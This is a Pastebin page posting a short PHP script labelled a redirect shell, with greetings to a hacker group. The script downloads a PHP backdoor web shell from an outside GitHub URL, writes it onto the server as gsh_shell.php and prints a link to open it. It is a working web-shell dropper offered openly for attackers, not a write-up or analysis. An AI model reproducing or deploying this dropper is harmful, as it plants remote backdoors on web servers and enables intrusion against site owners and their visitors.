Advertisement
LoscardosMandoza

Simple Rediect Shell by Yukinoshita47

Jan 20th, 2017
151
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. <?php
  2. //Greetz to :all Member Garuda Security Hacker
  3. function shadowhearts($url, $file){
  4. $usa = file_get_contents("$url");
  5. $frr = fopen("$file", 'w');
  6. fwrite($frr, $usa);
  7. }
  8. {
  9. $link_title = shadowhearts("https://raw.githubusercontent.com/Yukinoshita47/php-backdoor/master/Garuda%20Security%20Hacker%20Shell/gsh1.0.php", "gsh_shell.php");
  10. echo '<center><font color =red><a href="gsh_shell.php" target="_blank">View Shell</a>';
  11. }
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement